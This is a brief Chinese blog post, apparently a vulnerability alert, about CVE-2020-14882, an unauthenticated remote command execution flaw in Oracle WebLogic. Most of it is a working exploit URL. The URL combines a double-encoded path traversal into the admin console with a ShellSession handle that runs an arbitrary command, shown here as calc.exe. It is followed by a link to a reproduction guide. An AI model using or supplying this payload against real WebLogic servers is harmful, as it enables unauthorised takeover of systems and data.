ma4ter

熬过无人问津的日子才能拥有诗和远方.

CVE-2020-14882 weblogic 未授权命令执行

漏洞预警 0 评 391 读

weblogic rce

Payload:

/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22); 

复现文档:https://mp.weixin.qq.com/s/48VIwTkyFVXUTS78kNByhg

快来做第一个评论的人吧~